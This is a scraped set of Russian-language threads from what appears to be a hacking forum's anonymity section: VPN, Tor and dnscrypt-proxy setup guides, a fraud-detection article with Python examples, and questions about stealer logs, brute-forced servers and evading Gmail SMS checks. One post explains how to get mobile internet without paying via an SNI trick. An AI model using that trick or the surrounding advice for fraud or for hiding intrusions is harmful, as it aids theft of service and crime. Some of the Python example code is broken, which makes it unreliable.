— их разработчики до раскрытия уязвимости сначала получили о ней информацию, в рамках bug bounty, но просто игнорировали этот репорт, он пытался 2 дня связаться с разработчиками, но те его игнорировали, и обнаруживший эту уязвимость (на удивление разработчик XMR ) публично о ней сообщил спустя время (https://gist.github.com/kayabaNerve/b754e9ed9fa4cc2c607f38a83aa3df2a), чтоб предупредить сообщество об этой ошибке.

![gist.github.com](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fassets%2Fgist- og- image-54fd7dc0713e.png&hash=3c443d37e802be4e12ebf9a55c2a4385&return_error=1)

[ Deanonymization of the Dero Network

](https://gist.github.com/kayabaNerve/b754e9ed9fa4cc2c607f38a83aa3df2a)

Deanonymization of the Dero Network. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

Deanonymization of Dero | Derolytics

Due to the recent (4+ months ago) discovery of an issue the Dero code, it is now possible for anyone to access more data than previously thought. This issue rendered Dero's privacy effectively non-existent for nearly all current transactions, forever.

derolytics.com

x.com

![x.com](/proxy.php?image=https%3A%2F%2Fabs.twimg.com%2Fresponsive- web%2Fclient-web%2Ficon- ios.77d25eba.png&hash=94e4411cb81e6df692be25abb1f8c807&return_error=1) x.com

https://derolytics.com/files/dero_analysis.png

__https://twitter.com/x/status/1837879397891629469

__https://twitter.com/x/status/1837267291463110854

__https://twitter.com/x/status/1833310032517116315

P.S. Monero (XMR) не идеален и не обеспечивает 100% конфиденциальности и анонимности, особенно если вы допускаете много ошибок про которые я очень подробно и наглядно на примерах в следующем видео расскажу.

Еще раз повторюсь, Monero не идеален, но лучше ничего нет, и все что нужно, это знать про эти ошибки и пользоваться Monero правильно, и все у вас будет хорошо.

Аналоги Vidalia

ID: 676533bbb4103b69df371b66
Thread ID: 60487
Created: 2021-12-26T00:25:49+0000
Last Post: 2022-01-01T12:51:34+0000
Author: empty14
Replies: 9 Views: 504

Подскажите, пожалуйста, аналоги этой программы под win и под Ubuntu-подобные системы

VPS,RDP,SOCKS,PROXY

ID: 676533bbb4103b69df371b4e
Thread ID: 61702
Created: 2022-01-20T08:00:09+0000
Last Post: 2022-01-29T06:26:24+0000
Author: bugrom13
Replies: 2 Views: 502

Добрый день, интересует тема VPS,RDP,SOCKS,PROXY хочу начать правильно пользоватся данными сервисами, есть кто сможет обияснить как правильно пользоватся откуда покупать. Буду благодарен и из дальнеишей работы отблагадарю. Спасибо

Восстановления данных с ПК

ID: 676533bbb4103b69df371a72
Thread ID: 85456
Created: 2023-04-08T01:01:00+0000
Last Post: 2023-04-12T00:39:15+0000
Author: Codla
Replies: 4 Views: 502

Всем привет. Такой вопрос - можно ли вытащить информацию с пк после переустановки оси? Можно ли вытащить информацию со смартфона/пк после форматирования?
Если не затруднит опишите именно техническую составляющую вопроса (как работает сама запись и перезапись или направьте где удобоваримо этот вопрос объясняется)
Есть такая история полубайка, что у человека изъяли пк дома, отдали комп.криминалистам и они вытащили с него инфу, которая была на оси линукса (на момент изъятия стояла уже винда). Возможно ли такое? И если возможно, то кто нибудь знает софт который на такое способен?

Связка GL-MT2500+QNAP NAS

ID: 676533bbb4103b69df3719b9
Thread ID: 105791
Created: 2024-01-14T06:48:01+0000
Last Post: 2024-01-29T07:07:42+0000
Author: kamzzzzz
Replies: 6 Views: 502

Хочу использовать такую связку с возможностью доступа с использованием заводских средств QNAP. Реально ли организовать в связке TOR+WIREGUARD, И какую скорость можно выжать? Какие слабые места и советы по улучшению
И вообще интересно, какие варианты использования подобных коробочек еще интересные есть. А также аналоги

Использование OVPN конфига есть вопрос!

ID: 676533bbb4103b69df371bff
Thread ID: 51561
Created: 2021-05-09T10:17:37+0000
Last Post: 2021-05-09T18:06:57+0000
Author: xmenusa
Replies: 4 Views: 501

Пробовал на дедике создавать почту gmail (не просит смс).
Тоже самое проделал с виртуальной машиной и овпн конфигом и отключенным webrtc (идет запрос на смс)
Подскажите в чем беда что палит почта gmail?

Посоветуйте софт

ID: 676533bbb4103b69df3719e3
Thread ID: 68984
Created: 2022-06-21T09:28:43+0000
Last Post: 2023-11-20T08:30:03+0000
Author: tuda
Replies: 6 Views: 499

На вин сервере нужно сделать сетевой адаптер, который сможет работать через ссх, тобишь через туннель. Через адаптер будет работать виртуалка. Ну типа как хуникс гейт. только сетевая будет на виндовом хосте, и через нее будет работать вирта. Сетевуху надо что бы могла работать через тунели по ссх

Eleos VPN, обсуждение

ID: 676533bbb4103b69df371a81
Thread ID: 83586
Created: 2023-03-11T09:44:02+0000
Last Post: 2023-03-17T13:40:18+0000
Author: TrupServ
Replies: 7 Views: 499

Всем привет, интересует ваше мнение про ребят из EleOS
Насторожило что есть они везде, кроме XSS
Буду рад выслушать ваше мнение

MACOS /MACBOOK разбор ситуации по безопасности / использовании

ID: 676533bbb4103b69df371bc5
Thread ID: 54907
Created: 2021-08-05T21:09:59+0000
Last Post: 2021-08-06T10:48:08+0000
Author: tourdestuff
Replies: 3 Views: 499

Доброго времени суток !
Хотел бы разобраться в ситуации и услышать мнения разных людей и сделать , какой либо вывод.
Думаю данная тема будет интересна не только мне
Вообще у меня есть macbook , который использовался когда то в личных целях , но в процессе эксплуатации я приобрел внешний SSD накопитель на который установил MacOS и какое то время работал с различными антиками , пользовался разными VPN сервисами с внешнего SSD накопителя , ICLOUD на внешнем SSD не было так и никакой личной информации тоже там не было.
На основном SSD диске была личная информация , но macза это время только использовался в рабочих целях .
На данном этапе мне больше не нужен macbook так как перешел на другой девайс , хотелось для себя сделать вывод можно ли пользоваться данным лэптопом в личных целях ?

безопасность при краже информации

ID: 676533bbb4103b69df371b7a
Thread ID: 59212
Created: 2021-11-23T20:00:51+0000
Last Post: 2021-11-25T21:54:07+0000
Author: krakenum123
Replies: 9 Views: 498

хочу услышать ваше мнение, как безопасно лазать в логах(Через mozilla ), и получать их через стилер

Прокси сервис по подписке

ID: 676533bbb4103b69df371bf8
Thread ID: 51824
Created: 2021-05-16T18:59:30+0000
Last Post: 2021-05-18T20:58:10+0000
Author: Vodoley
Replies: 1 Views: 496

Здравствуйте.
Помню был такой сервис best-proxies.ru. Можно было покупать подписку на месяц и получать большой список прокси под любые твои нужды.
Скорость конечно была не такая как при личных прокси, но мне скорость не критически важна.
Сейчас этот сервис пропал. Ищу похожий. Кто нибудь знает такой?
Заранее спасибо!

Анонимность и бесплатный интернет.

ID: 676533bbb4103b69df371c00
Thread ID: 51582
Created: 2021-05-09T16:42:46+0000
Last Post: 2021-05-09T16:42:46+0000
Author: evmorty
Replies: 0 Views: 495

Знаю то что тема заезженная, но выложу, мб кто не знал)

В данной теме опишу как можно использовать свой интернет на мобилке(даже при минусовом балансе)
Сам эту тему юзаю и не плачу за симку уже 2 месяцаhttps://lolz[.]guru/styles/default/xenforo/smilies/new/da.gif

Итак, пробуем:

Spoiler: Что для этого нам потребуется

Итак, нам потребуется
-мобила(андроид)
-связь(ну думаю если вы на лолзе - связь есть)
-ПРЯМЫЕ РУКИ И НЕ МНОГО УМА
-ПК(Не обязательно)

Скачиваем приложения:

Spoiler: http injector

https://play.google.com/store/apps/details?id=com.evozi.injector&hl=ru&gl=US

Spoiler: Если вам надо будет раздавать на ПК

http://pdanet.co/install/
Скачивайте на ПК и на Android

Spoiler: Настраиваем http injector

Заходим, жмякаем на Sni и туда вводим сайт нашего провайдера(у мегафона - lk.megafon.ru, тинькофф - www.tinkoff.ru и т.д.)
Включаем, проверяем.

Spoiler: Раздаем инет на ПК

Если есть Wifi приемник на ПК/ноуте https://lolz[.]guru/styles/default/xenforo/smilies/finger_up.pngвыбираем на мобиле - Wifi Direct HotSpot с пк выбираем Wifi Share

Если нету https://lolz[.]guru/styles/default/xenforo/smilies/finger_down.png?1- подключаем телефон по USB, разрешаем откладку по USB, выбираем USB tether, С ПК тоже самое

Spoiler: Причем тут анонимность?

Сервера дают какие не какие прокси, кста они +- чистые

На этом все думаю, пасебо всем

Децентрализованный VPN (dVPN), обсуждение

ID: 676533bbb4103b69df371984
Thread ID: 105080
Created: 2024-01-04T13:23:23+0000
Last Post: 2024-03-29T09:28:50+0000
Author: Dobryi
Replies: 2 Views: 494

Может кто-то использует dVPN и может подсказать, намного ли он медленнее своего традиционного аналога с центральным сервером (та и вообще эффективнее в плане анонимности)? И может существует годный мануал по поднятию своего dVPN или можете подсказать хорошее готовое решение? Был бы очень рад

Binaryedge, shodan и т.п. - как анонимно оплатить?

ID: 676533bbb4103b69df371bfa
Thread ID: 51736
Created: 2021-05-13T18:33:30+0000
Last Post: 2021-05-14T11:18:56+0000
Author: Lescer
Replies: 2 Views: 492

Подскажите, пожалуйста, как можно удобно анонимно оплатить Binaryedge, Shodan , Zoomeye и прочие аналоги ? Какой нибудь сервис с покупкой ВЦЦ препейд

Свой VPN на сбрученных дедиках.

ID: 676533bbb4103b69df371a09
Thread ID: 98077
Created: 2023-09-14T17:51:00+0000
Last Post: 2023-09-15T19:07:56+0000
Author: whiteblack
Replies: 10 Views: 491

Как думаете на сколько безопасен данный способ? И делает ли так кто-то?

V2ray, ShadowSocks, Xray, Trojan, Vless, Vmess - бесплатные VPN для Android, iOS, Windows.

ID: 676533bbb4103b69df37199f
Thread ID: 107979
Created: 2024-02-10T20:53:08+0000
Last Post: 2024-02-20T19:33:31+0000
Author: ThorZirael
Prefix: Видео
Replies: 1 Views: 489

**Легко обходим любые блокировки бесплатно. Настраиваем более 4000 бесплатных VPN для Android / iOS / Windows

Для Windows - NekoRay / NekoBox**

[ Releases · MatsuriDayo/nekoray

](https://github.com/MatsuriDayo/nekoray/releases)

Qt based cross-platform GUI proxy configuration manager (backend: v2ray / sing-box) - MatsuriDayo/nekoray

github.com

4000 список VPN

![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fd3823abb7320e866d0970f69580c4a88f073c2ebbe2346eaa30fcd90b8539bbd%2Fbarry- far%2FV2ray-Configs&hash=9d54bdbb4856b01420298cdf262ebaa8&return_error=1)

[ GitHub - barry-far/V2ray-Configs: 🛰️✨ Free V2ray Configs , Updating

Every 10 minutes. ](https://github.com/barry-far/V2ray-Configs)

🛰️✨ Free V2ray Configs , Updating Every 10 minutes. - GitHub - barry- far/V2ray-Configs: 🛰️✨ Free V2ray Configs , Updating Every 10 minutes.

github.com

Для Iphone / Android - V2Box — клиент V2ray

[ V2Box - V2ray Client ](https://apps.apple.com/us/app/v2box-v2ray-

client/id6446814690)

V2box - VPN Internet network proxy , Supports multiple proxy protocols, such as Shadowsocks, V2ray, Vmess, Trojan , SSH Features: - Support for adding custom servers proxy (Shadowsocks, v2ray, trojan,vless,vmess, SSH) - Support Reality (xray) - Support vless vision - Support utls - Support...

apps.apple.com

![play.google.com](/proxy.php?image=https%3A%2F%2Fplay- lh.googleusercontent.com%2FkVeisXWkT4oRMDsZbFrY7XXJvnxHJ7PnQFE71XCcCWAoeOAg5G3HJRDp4Ro3Xbc3WA&hash=69397c1f1bf3e51f7c4755e3ca48955f&return_error=1)

[ ÐÑÐ¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð² Google Play â V2Box - V2ray Client

](https://play.google.com/store/apps/details?id=dev.hexasoftware.v2box&hl=ru)

v2ray/vmess/vless/trojan/v2rayng/SSH

play.google.com

Сначала VPN блокировался провайдерами путем массовых блоков ip адресов VPN сервисов, потом люди стали создавать собственные VPN которые запускали на своих серверах, что стали делать провайдера – блокировать целые протоколы.

Т.е. к примеру вы используете WireGuard, а провайдера научились определять среди интернет трафика то, что вы его используете и просто напросто блокируют использование целого протокола, такого как WireGuard. Понятное дело где-то это WireGuard у одного провайдера, у другого будет Proxy, у третьего OpenVPN, и тд.

На самом деле нет ничего в этом страшного, есть решения которые не будут обнаружены и заблокированы вашим провайдером, V2Ray / XRay / ShadowSocks , есть и другие я назвал только популярные решения/

Свой не блокируемый VPN - ShadowSocks. Легкая установка. Как обойти любые блокировки в интернете. (видео https://xss.is/threads/107880/)

VPN не анонимен. Почему нельзя использовать VPN.(видео https://xss.is/threads/107447/)

Ультимативная анонимность Windows. WireGuard+TOR+OpenVPN (видео https://xss.is/threads/107446/)

Настраиваем torctl

ID: 676533bbb4103b69df3719d7
Thread ID: 103724
Created: 2023-12-08T04:30:46+0000
Last Post: 2023-12-08T18:32:05+0000
Author: dedalgern0n
Prefix: Статья
Replies: 6 Views: 489

Господа, приветствую.

Не в курсе, может данная тема уже в прошлом и затрагивалась, но решил все равно поделиться. Может кому пригодится, да и мне реакции не помешают.
Будем сегодня настраивать тор таким образом, чтобы весь ваш трафик проходил через него. Само по себе, конечно это не сделает вас полностью анонимным (а в некоторых случаях может быть и опасной затеей), но в связке с другими инструментами работает очень даже не плохо.

Bash:Copy to clipboard

# обновляем список пакетов и устанавливаем тор sudo apt-get update sudo apt-get install tor -y # устанавливаем tor, анонимизатор мака и секюр-делит sudo apt-get install tor macchanger secure-delete # устанавливаем git и клонируем репозиторию с torctl sudo apt-get install git-all git clone <https://github.com/BlackArch/torctl> # переходим а папку torctl cd torctl # перемещаем все содержимое дериктории service/ в дерикторию /etc/systemd/system/ # перемещаем bash-completion/torctl скрипт в директорию /usr/share/bash-completion/completions/ sudo mv service/* /etc/systemd/system/ sudo mv bash-completion/torctl /usr/share/bash-completion/completions/torctl # с помощью команды sed изменяем скрипт, чтобы он не запускал iptables # с помощью команды sed изменяем tor user id из tor в debian-tor если у вас дебиан sed -i 's/start_service iptables//' torctl sed -i 's/TOR_UID="tor"/TOR_UID="debian-tor"/' torctl # перемещаем скрипт в /usr/local/bin/torctl чтобы удобнее было работать sudo mv torctl /usr/local/bin/torctl # подчищаем за собой cd .. && rm -rf torctl/ # и проверяем все ли работает torctl --help

Работает так же как и systemctl

Bash:Copy to clipboard

# основные команды sudo torctl start sudo torctl stop sudo torctl status # проверяем curl ifconfig.me traceroute google.com

Надеюсь, кто то сочтет для себя полезным. Если возникнут вопросы пишите в комментариях, буду рад ответить)
Если такого рода информация вас интересует, в будущем могу поразвернутее составить мануал по тому как держать анонимный С2 сервер (и не только) с реверс прокси, впн и тд.

Благодарю за внимание.

Как "Казаки" паттерны мошенников-"Разбойников" вычисляют, вооружаясь технологиями.

ID: 676533bbb4103b69df371927
Thread ID: 123503
Created: 2024-09-25T18:06:30+0000
Last Post: 2024-09-25T18:06:30+0000
Author: n0_mad
Prefix: Статья
Replies: 0 Views: 488

Автор: NomadSP
Источник: XSS.is
Мошеннические действия разного характера, стали обыденным предметом обсуждения на совещании каждого отдела безопасности в любой сфере деятельности, которые приобрели новый виток развития вместе с эволюцией технологий.

Поэтому адаптироваться приходится обеим сторонам. Одни ищут и мешают - другие пытаются обмануть. Этакие "Казаки-Разбойники". В данном случае мы поговорим о тех, которые "Казаки", а ещё что они делают для того, чтобы ловить было проще и мешать эффективнее, ведь схемы тоже имеют свои признаки в виде конкретных аномалий. В этой статье мы рассмотрим ряд программных решений, которые помогут в анализе мошеннических паттернов.

**Что в арсенале?

- Мониторинг и реагирование.**
Опыт мне подсказывает, что первоочередная задача - анализировать всё в реальном времени, поэтому использование таких систем как SAS Faud Management или FICO Falcon Fraud Manager является хорошим началом.
Обе системы позволяют анализировать, обнаруживать и предотвращать мошеннические действия. Не говоря о том, что SAS(прямо как Special Air Service) ещё и использует машинное обучение в совокупности с исторически логгируемыми данными для обучения моделей. Однако в противовес, FICO более заточен под сетевой анализ на основе взаимосвязей, например, между транзакциями.

- Визуализация.
Учитывая огромные объемы данных использование такого инструмента как Tableau позволит визуализировать в виде интерактивных дашбордов и отчётов всё необходимое. Вдобавок, интегрируя с различными базами данных, мы получаем уже систематизированные выводы.

- ИИ.
С распространением ИИ, потребность в мощных вычислительных инструментах для анализа относительно закрыта. При расследовании каких-то аномалий данных может быть масса, поэтому IBM Watson со своей функцией NLP(Обработка естественного языка) позволяет подключать ещё и анализ текстовых данных для вычисления схем.
В своих начинаниях, я могу отметить так же и функцию предсказательной аналитики, которая как палочка-выручалочка, предсказывала вероятность мошенничества, выявляя сложные паттерны.

- Анализ.
Neo4j в качестве базы данных графов, которая позволит визуализировать связи между сущностями и моделировать взаимосвязи между участниками транзакций, в результате может помочь выявить схемы мошенничества или дать дополнительные данные для анализа. Из преимуществ так же выделю поддержку Cypher Query Language, придающий удобности в плане запросов для работы с графами.

Это лишь малый набор инструментов, который я могу посоветовать для работы в плане аналитики и обнаружения. Однако, стоит учитывать, что это лишь утилиты, которые упрощают работу сотрудника, но не полностью её автоматизирует.

Распространенные методики.

Сотрудникам необходимо вырабатывать собственные методики анализа мошеннических паттернов, поэтому я с удовольствием поделюсь некоторыми выработанными опциями, которые применяются на практике или адаптируются под себя.

1. Метод сбора и обработки данных.

Кейс:
- В имеющихся транзакционных данных необходимо выявить подозрительные операции.

Действия:
- Сбор исторических данных за месячный временной промежуток.
- Поиск аномальных транзакций(Превышение лимита; Нетипичное время; Местоположение).

Практика:
- Используя Python, можно создать простую программу для выявления подобных транзакций.

Пример:

Python:Copy to clipboard

import pandas as pd import numpy as np # Пример данных о транзакциях data = { 'transaction_id': [1, 2, 3, 4, 5, 6], 'amount': [100, 2500, 300, 150, 7000, 50], 'timestamp': [ '2024-10-01 08:30:00', '2024-10-01 23:00:00', '2024-10-02 14:00:00', '2024-10-02 02:00:00', '2024-10-02 15:30:00', '2024-10-02 19:00:00' ] } # Создаем DataFrame df = pd.DataFrame(data) # Преобразуем столбец timestamp в тип datetime df['timestamp'] = pd.to_datetime(df['timestamp']) # Задаем лимит для транзакций amount_limit = 2000 # Определяем "необычное время" (например, с 22:00 до 6:00) unusual_hours_start = 22 unusual_hours_end = 6 # Функция для проверки на необычное время def is_unusual_time(timestamp): hour = timestamp.hour return hour >= unusual_hours_start or hour < unusual_hours_end # Ищем подозрительные транзакции suspicious_transactions = df[ (df['amount'] > amount_limit) | (df['timestamp'].apply(is_unusual_time)) ] # Добавляем дополнительную аномалию (например, транзакции менее 100) suspicious_transactions = suspicious_transactions.append( df[df['amount'] < 100] ) # Удаляем дубликаты suspicious_transactions = suspicious_transactions.drop_duplicates() # Выводим результаты print("Подозрительные транзакции:") print(suspicious_transactions)

Итоги:
1. Данные: Мы создаем небольшой набор данных с идентификатором транзакции, суммой и Time Stamp.
2. Преобразование времени: Преобразуем столбец timestamp в формат datetime.
3. Критерии подозрительности:
- Транзакции, превышающие лимит (например, 2000).
- Транзакции, происходящие в необычное время (с 22:00 до 6:00).
- Транзакции менее 100.
4. Вывод результатов: Выводим все подозрительные транзакции.

2. Метод кластеризации.

Кейс:
- Необходимо сгруппировать транзакции по сходим признакам, чтобы в дальнейшем выявить подозрительные группы.

Действия:
- Создаём кластеризацию по необходимым признакам.
- Задаём алгоритм К-средних для анализа.
- Обнаруживаем аномалии по признакам.

Практика:
- Используем Python для поиска групп клиентов из одного региона, совершающие нетипичные транзакции.

Пример:

Python:Copy to clipboard

import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.cluster import KMeans from sklearn.preprocessing import StandardScaler # Пример данных о транзакциях data = { 'transaction_id': range(1, 21), 'amount': [100, 2500, 300, 150, 7000, 50, 1200, 1800, 5000, 600, 200, 3000, 4000, 800, 900, 1500, 2200, 3500, 4500, 10000, 50], 'location': np.random.choice(['Location A', 'Location B', 'Locaion C', 'Locatiion D'], size=20) } # Создаем DataFrame df = pd.DataFrame(data) # Преобразуем местоположение в числовые значения (one-hot encoding) df_encoded = pd.get_dummies(df[['location']], drop_first=True) # Объединяем с оригинальным DataFrame df_combined = pd.concat([df[['amount']], df_encoded], axis=1) # Стандартизируем данные scaler = StandardScaler() X_scaled = scaler.fit_transform(df_combined) # Применяем алгоритм K-средних kmeans = KMeans(n_clusters=3, random_state=42) df['cluster'] = kmeans.fit_predict(X_scaled) # Выводим результаты print("Транзакции с присвоенными кластерами:") print(df) # Визуализация кластеров (по сумме) plt.figure(figsize=(10, 6)) plt.scatter(df['amount'], df['cluster'], c=df['cluster'], cmap='viridis') plt.title('Кластеризация транзакций по сумме') plt.xlabel('Сумма транзакции') plt.ylabel('Класс') plt.colorbar(label='Кластер') plt.show() # Анализ кластеров for cluster in range(3): print(f"\nАнализ кластера {cluster}:") cluster_data = df[df['cluster'] == cluster] print(cluster_data.describe())

Итоги:
1. Данные: Мы создаем набор данных с идентификатором транзакции, суммой и местоположением.
2. One-hot encoding: Преобразуем категориальные данные (местоположение) в числовые значения.
3. Стандартизация: Используем StandardScaler для стандартизации данных перед кластеризацией.
4. K-средние: Применяем алгоритм K-средних для кластеризации данных на 3 группы.
5. Визуализация: Строим график для визуализации кластеров по сумме транзакций.
6. Анализ кластеров: Выводим статистику для каждого кластера.

3. Метод анализа связей.

Кейс:
-Необходимо задать метод построения взаимосвязей между участниками транзакций.

Действия:
- Создание граф для построения цепочек между потенциальными участниками мошеннических схем и создание алгоритма(например, алгоритм Лувена).
- Задаём узлы(клиенты) и ребра(транзакции).
- Создаём визуализацию для выявление сетей.

Практика:
- Создаём скрипт на Python, для выявления узлов с высокой степенью централизации с помощью инструментов для визуализации по типу Gephi.

Пример:

Python:Copy to clipboard

import pandas as pd import networkx as nx import matplotlib.pyplot as plt # Шаг 1: Сбор данных # Пример данных о транзакциях data = { 'client_1': ['A', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'], 'client_2': ['B', 'C', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'A'], 'amount': [100, 150, 200, 300, 400, 500, 600, 700, 800, 900] } # Создаем DataFrame df = pd.DataFrame(data) # Шаг 2: Создание графа G = nx.Graph() # Добавляем ребра в граф с весом for index, row in df.iterrows(): G.add_edge(row['client_1'], row['client_2'], weight=row['amount']) # Шаг 3: Анализ структуры сети # Вычисляем центральность degree_centrality = nx.degree_centrality(G) betweenness_centrality = nx.betweenness_centrality(G) # Находим узлы с высокой степенью центральности high_degree_nodes = [node for node, centrality in degree_centrality.items() if centrality > 0.3] print("Узлы с высокой степенью центральности:", high_degree_nodes) # Шаг 4: Визуализация графа plt.figure(figsize=(10, 8)) pos = nx.spring_layout(G) nx.draw(G, pos, with_labels=True, node_color='lightblue', node_size=2000, font_size=12) labels = nx.get_edge_attributes(G, 'weight') nx.draw_networkx_edge_labels(G, pos, edge_labels=labels) plt.title('Граф транзакций') plt.show() # Шаг 5: Вывод результатов print("\nСтепень центральности:") for node, centrality in degree_centrality.items(): print(f"{node}: {centrality:.4f}") print("\nЦентральность посредничества:") for node, centrality in betweenness_centrality.items(): print(f"{node}: {centrality:.4f}")

Итоги:
1. Сбор данных: Создаем DataFrame с данными о транзакциях.
2. Создание графа: Используем библиотеку NetworkX для создания граф.
3. Анализ структуры сети: Вычисляем степень и посредническую центральность узлов.
4. Визуализация графа: Используем Matplotlib для визуализации графа транзакций.
5. Вывод результатов: Выводим связи с высокой центральностью и соответствующие значения.

Применение.

С помощью таких методов включительно, сотрудники находят такие схемы как:

Мошенничество с кредитными картами : Обнаружение аномалий в транзакциях, таких как необычные суммы или частота операций, или нетипичная локация, или все в совокупности помогло выявить случаи несанкционированного использования карт. Например, алгоритмы кластерного анализа транзакционных данных позволяют быстро идентифицировать подозрительные активности.

AML : Используя инструменты для анализа связей транзакций, сотрудники ИБ смогли распознать сложные схемы отмывания денег, выявляя аномальные паттерны и связи между участниками.

Заключение.
Мы разобрали как ищут мошеннические схемы и операции, а так же какие инструменты можно использовать для данных мероприятий. Конечно, описанное мной в данной статье даёт лишь малое представление того, как финансовые организации вычисляют "Разбойников". Однако, даже это даст вполне не плохой старт для изучения или слздания собственных методов обработки поступающих данных с целью сохранения репутации компании и средств ваших клиентов.
До скорых встреч!

Установка dnscrypt-proxy в Debian_10

ID: 676533bbb4103b69df371bc6
Thread ID: 54898
Created: 2021-08-05T16:13:02+0000
Last Post: 2021-08-05T16:13:02+0000
Author: Чупа-Кабра
Replies: 0 Views: 488

Хм. Признаюсь откровенно, мне не особо хочется писать эту статью. Я пишу её только потому,что в данный момент возникло желание поправить корону очередному голому королю.
Итак, каждый человек, который хоть сколько нибудь серьёзно относится к хакингу задумывался на собственной безопасностью в интернете. мыслям о безопасности тем или иным способом способствуют новостные ленты, которые словно наперебой сообщают об отравлениях, каких-то невероятных смертях, о преследовании неугодных, одним словом о том, что в страной правит беспредел. Поди разбери, что у этих беспредельщиков в голове, к каким выводам придут эти отягощённые беспредельной властью чуваки.
Мысль о шифровании своего трафика неизбежно рано или поздно поселится в зерном в сознании здравомыслящего человека, а затем неизбежно прорастёт.
На этом закончу свои попытки понравиться читателю и перейду к описанию одного из множества способов того, как усложнить жизнь чувакам, которые пытаются влезть в личную жизнь. Речь пойдёт о программе dnscrypt-proxy - кроссплатформенной программе, нашедшей своё применение практически во всех реализациях линукс, включая OpenWRT, Windows. Наверняка, пользователи макинтошей при желании также смогут ею воспользоваться - но это не точно )
Прежде чем приступить к установке dnscrypt-proxy в linux, пользователь должен отчётливо понимать, что это - далеко не единственный резолвер dns-запросов в системе. В частности, уже в минимальной сборке debian, которую можно скачать с официального сайта, присутствует родной резолвер запросов доменных имён. А иначе и быть не может: ведь иначе невозможно было-бы обновить систему из репозиториев, без него невозможно было-бы скачать сорцы из платформы git: разрешение доменных имён попросту не работвло-бы. Имя упомянутому резолверу - systemd-resolved. И нужно понимать, что при установке дополнительной программы-резолвера доменных имён systemd-resolved будет попросту "мешать", так как использование в системе двух программ с аналогичным назначение попросту не секьюрно: поди разберись, какому из них система отдаст предпочтение. Исходя из этих соображений, после установки и успешного тестирования dnscrypt-proxy необходимо будет отключить systemd-resolved.
Прежде чем перейти к описанию алгоритма установки dnscrypt-proxy, хочется сказать, что линукс очень богат на программы подобного типа. На право претендовать в список программ, которые посылают системные запросы к dns- серверам претендуют всем известный стандартный dnsmasq, NetworkManager, Unbound, cloudflared, stubby, dnss и этот можно продолжить.
Если пользователя пугает установка пакета из исходников, то спешу обрадовать: пакет dnscrypt-proxy имеется в репозиториях почти всех дебиано-пдобных систем. Думаю, не ошибусь, если буду утверждать, что скомпилированные пакеты имеются также в репозиториях arch. Поэтому становку пакета можно осуществить буквально одной командой:
$ sudo apt install dnscrypt-proxy. Разумеется, перед этой командой систему необходимо обновить.
Установка программы - дело нескольких движений и не требует особых навыков. Настрйка программы - занятие немного более хлопотное, но и с ним мы сейчас справимся.

Настройка программы сводится к редактированию конфигурационного файла /etc/dnscrypt-proxy/dnscrypt-proxy.toml Файл dnscrypt-proxy.toml - это текстовый файл, редактируется в любом текстовом редакторе, и от его содержания зависит работоспособность программы и шифрование dns-трафика.
$ sudo nano /etc/dnscrypt-proxy/dnscrypt-proxy.toml
Описывать каждую настройку, думаю нет смысла. Нет смысла по нескольким причинам:

Во первых, на цвет и вкус товарищей нет. Впрочем, я не делаю секрета из содержимого своего файла dnscrypt-proxy.toml и где нибудь по ходу пьессы непременно ознакомлю с ним своего читателя.

Во вторых, глупо с умным лицом перечислять все эти настройки. По меньшей мере, я терпеть не могу статьи, авторы которых вот так перечисляют смысл каких-то слов, словно это - комментарии к какому-то кодексу РФ, если токо эт статья не является руководством к той или иной программе.

Наверное, существует и в-третьих, и в-четвёртых...

Эта статья об установке, а не о моих оправданиях )
В этом месте уместно ознакомить читателя со своим файлом конфигурации dnscrypt-proxy

Code:Copy to clipboard

└>cat /etc/dnscrypt-proxy/dnscrypt-proxy.toml # Empty listen_addresses to use systemd socket activation listen_addresses = [] #server_names = ['scaleway-fr', 'google', 'yandex', 'cloudflare'] server_names = ['doh.nsa.gov'] [query_log] file = '/var/log/dnscrypt-proxy/query.log' [nx_log] file = '/var/log/dnscrypt-proxy/nx.log' [sources] [sources.'public-resolvers'] url = 'https://download.dnscrypt.info/resolvers-list/v2/public-resolvers.md' cache_file = '/var/cache/dnscrypt-proxy/public-resolvers.md' minisign_key = 'RWQf6LRCGA9i53mlYecO4IzT51TGPpvWucNSCh1CBM0QTaLn73Y7GFO3' refresh_delay = 72 prefix = ''

В поле server_names нужно указать список серверов, к которым будет обращаться dnscrypt-proxy для разрешения DNS.
Выше представленный файл является минимальным, гарантирующим ракботоспособность программы. Как я уже упомянул выше, дальнейшие настройки я предпочитаю делать по-нарастающей. Просто читаете справку по этому файлу и наращиваете файл конфигурации, исходя из своих запросов.
К примеру, мне очень нравится не токо шифровать трафик, но и пропускать его через локальный TOR-прокси.
В этом случае, в вышеупомянутый файл необходимо добавить две строчки:

Code:Copy to clipboard

force_tcp = true proxy = 'socks5://127.0.0.1:9050'

Думаю, не нужно упоминать о том, что этот самый тор должен быть установлен, настроен соответствующим образом и успешно запущен в Вашей системе.
Ни для кого не секрет, что файлом, в котором указан сервер, принимающий ДНС- запросы является /etc/resolv.conf.
Практически во всех источниках информации рекомендуется не рерактировать, а удалить и создать файл по-новому (мне не нравится это словосочетание, но смысл понятен).

Code:Copy to clipboard

$ sudo nano /etc/resolv.conf nameserver 127.0.2.1 options edns0 single-request-reopen

Запретить дальнейшее изменене этого файла:
$ sudo chattr +i /etc/resolv.conf
ВНИМАНИЕ: если в системе установлен resolvconf, то его также необходимо удалить:

Для начала выясняем, является ли /etc/resolv.conf симлинком куда-то там:

file /etc/resolv.conf

/etc/resolv.conf: symbolic link to /etc/resolvconf/run/resolv.conf

Если видим такую надпись — делаем так:

unlink /etc/resolv.conf

$ sudo systemctl list-unit-files | grep resolv
resolvconf.service enabled
systemd-resolved.service disabled

$ sudo systemctl stop resolvconf.service
$ sudo systemctl disable resolvconf.service
$ sudo apt remove resolvconf
$ sudo apt purge resolvconf

Click to expand...

Можно запускать dnscrypt-proxy:
$ sudo systemctl enable dnscrypt-proxy.service
На данном этапе можно пробовать запускать dnscrypt-proxy командой:
$ sudo systemctl start dnscrypt-proxy.service
А также можно установить его в автозагрузку.
$ sudo systemctl enable dnscrypt-proxy.service
Проверить работоспособность запущенной проограммы можно командой:
$ sudo systemctl status dnscrypt-proxy.service
